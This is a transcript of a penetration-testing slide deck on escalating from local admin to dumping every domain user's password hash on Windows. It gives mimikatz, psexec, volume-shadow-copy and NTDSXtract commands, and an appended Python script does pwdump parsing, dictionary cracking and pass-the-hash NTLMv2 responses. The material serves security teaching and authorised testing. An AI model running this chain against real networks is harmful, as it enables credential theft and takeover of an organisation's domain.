Fall of a domain | From local admin to Domain user hashes
 

Author: Riyaz Walikar

Usage Rights: © All Rights Reserved


Presentation Transcript

• The Fall of a Domain: Local Admin to Domain User Hashes (Riyaz Walikar)
• Disclaimer
  ◦ It was far more painstaking and complicated than this!
  ◦ Demo setup to show the execution path
  ◦ All the commands were actually used in the pentest
  ◦ Please do not try this on your office/corporate environment without written permission
• Please exercise caution!
• The story so far
  ◦ Remote RDP access to a machine on the client network via VPN
  ◦ Local Administrator rights, to simulate an employee
  ◦ The user is a limited domain user
  ◦ Domain controller on the same network, reachable, with LDAP services running
• Visually. This. [network diagram]
• Local Admin, eh?
  ◦ Locally logged in as TARDIS\fwhite
  ◦ Limited domain user, but local admin
  ◦ Other users connected? [Task Manager > Users]
  ◦ Found another user connected to our system via RDP (sweet! possibly a domain admin)
  ◦ Need SYSTEM privileges! Any ideas?
• Think Sysinternals!
  ◦ psexec -s -i cmd.exe
• Dump connected user credentials
  ◦ mimikatz (Benjamin Delpy)
  ◦ Extracts plaintext passwords from LSASS memory: wdigest, tspkg, kerberos and many more (on Windows 8.1 / Server 2012 R2 and later, wdigest no longer caches plaintext by default)
  ◦ mimikatz
  ◦ privilege::debug
  ◦ token::elevate
  ◦ sekurlsa::logonPasswords
• Windows (In)Security?
• Now what? http://gapingvoid.com/2008/06/13/now-what/
• Remote CMD, anyone?
  ◦ RDP directly!
  ◦ Let's be discreet :)
  ◦ psexec \\10.10.10.1 -s -u TARDIS\atomboy cmd.exe
  ◦ Game already over!
  ◦ Instead, RDP in with the captured credentials and present the report
• Let's grab some hashes
  ◦ Active Directory stores user information in %systemroot%\NTDS\ntds.dit
  ◦ Locked while the system is running (held open by lsass), so it cannot be copied directly
  ◦ ntdsutil + snapshot = backup (Windows Server 2008 and later)
  ◦ vssadmin create shadow /for=C: (Windows Server 2003 and later)
• Let's grab some hashes
  ◦ The backup is readable by NT AUTHORITY\SYSTEM and Administrators
  ◦ We need the ntds.dit and SYSTEM files (the SYSTEM hive holds the boot key needed to decrypt the hashes)
  ◦ cd, dir and the other built-in cmd commands do not work on unmounted volume shadow copies
  ◦ copy works!
• Core files needed [screenshot]
• NTDS.dit structure: how to parse it?
  ◦ NTDSXtract: a framework for offline forensic analysis of ntds.dit
  ◦ Needs the libesedb module as well
  ◦ libesedb and creddump are bundled in ntds_dump_hash.zip
  ◦ wget to a Linux box (Kali is a good choice)
• Get framework + compile + make + run
  ◦ wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
  ◦ wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
  ◦ unzip both
• Get framework + compile + make + run
  ◦ cd ntds_dump_hash/libesedb
  ◦ ./configure && make
  ◦ cd libesedb/esedbtools
  ◦ ./esedbexport -l /tmp/ntds.log <ntds.dit>
  ◦ esedbexport writes the tables into a <ntds.dit>.export/ directory; the datatable and link_table files in there are what dsusers.py needs
• Yay!
  ◦ python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>
  ◦ Clean up the output into pwdump format with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py)
• Now what? http://gapingvoid.com/2008/06/13/now-what/
• Pass the hash / password cracking!
  ◦ Use the Windows Credentials Editor (Amplia Security)
  ◦ Password cracking >> Humla, perhaps :)
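What the pwdump lines from ntdstopwdump.py contain, and why the two options on the last slide (pass the hash, crack offline) both work, as an added example that is not from the deck, WCE or mimikatz. It parses pwdump lines, recomputes NT hashes (unsalted MD4 over the UTF-16LE password, implemented inline because hashlib's MD4 is often disabled under OpenSSL 3), runs a dictionary check against them, and builds an MS-NLMP NTLMv2 response from the NT hash alone, which is the whole basis of pass-the-hash. The sample dump, the wordlist, the third account's hash (a made-up value, not any real password's hash) and the challenge/blob bytes are constructed; the domain name TARDIS is taken from the slides.

```python
"""Added example (not part of the original deck): pwdump parsing, NT hash
recomputation, a dictionary check, and an NTLMv2 response derived from the
hash only (pass-the-hash). MD4 is implemented here because hashlib's md4 is
frequently unavailable under OpenSSL 3.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. LM storage disabled


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (little-endian, 3 rounds of 16 steps per 64-byte block)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + f(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: next step updates the old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash: unsalted MD4 of the UTF-16LE password, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse pwdump lines (user:rid:lm:nt:::) such as ntdstopwdump.py emits."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, rid, lm, nt = line.split(":")[:4]
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"malformed hash field in line for {user!r}")
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
                        "lm_disabled": lm.lower() == EMPTY_LM})
    return entries


def dictionary_attack(entries: list, wordlist: list) -> dict:
    """Users whose NT hash matches a candidate ("" catches blank passwords)."""
    lookup = {nt_hash(w): w for w in [""] + list(wordlist)}
    return {e["user"]: lookup[e["nt"]] for e in entries if e["nt"] in lookup}


def ntlmv2_response(nt_hash_hex: str, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """MS-NLMP NTLMv2: NTProofStr || blob. Only the NT hash goes in, never the password."""
    key = hmac.new(bytes.fromhex(nt_hash_hex), (user.upper() + domain).encode("utf-16-le"),
                   hashlib.md5).digest()  # NTOWFv2
    proof = hmac.new(key, server_challenge + client_blob, hashlib.md5).digest()
    return proof + client_blob


# Constructed sample dump: NT hashes of "password" and "", plus a made-up third hash.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fwhite:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
SAMPLE_WORDLIST = ["welcome1", "password", "Summer2013"]  # constructed

if __name__ == "__main__":
    entries = parse_pwdump(SAMPLE_PWDUMP)
    print(dictionary_attack(entries, SAMPLE_WORDLIST))
    # Pass-the-hash: the dumped hash is all an NTLM client needs to answer a challenge.
    chal, blob = bytes(range(8)), b"\x01\x01" + b"\x00" * 6 + b"\x02" * 8
    print(ntlmv2_response(entries[0]["nt"], "Administrator", "TARDIS", chal, blob).hex())
```

The dictionary check is deliberately a dict lookup: with no salt, one MD4 per candidate serves every account in the dump at once, which is why a few million guesses against a whole domain is cheap. The blob in the stand-alone run is a minimal NTLMv2 temp structure for illustration; a real client fills in timestamp, client nonce and target info.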
• References
  ◦ http://blog.gentilkiwi.com/mimikatz
  ◦ http://www.ampliasecurity.com/research/wcefaq.html
  ◦ http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_16.html
• Thank you: riyazwalikar@gmail.com, http://www.riyazwalikar.com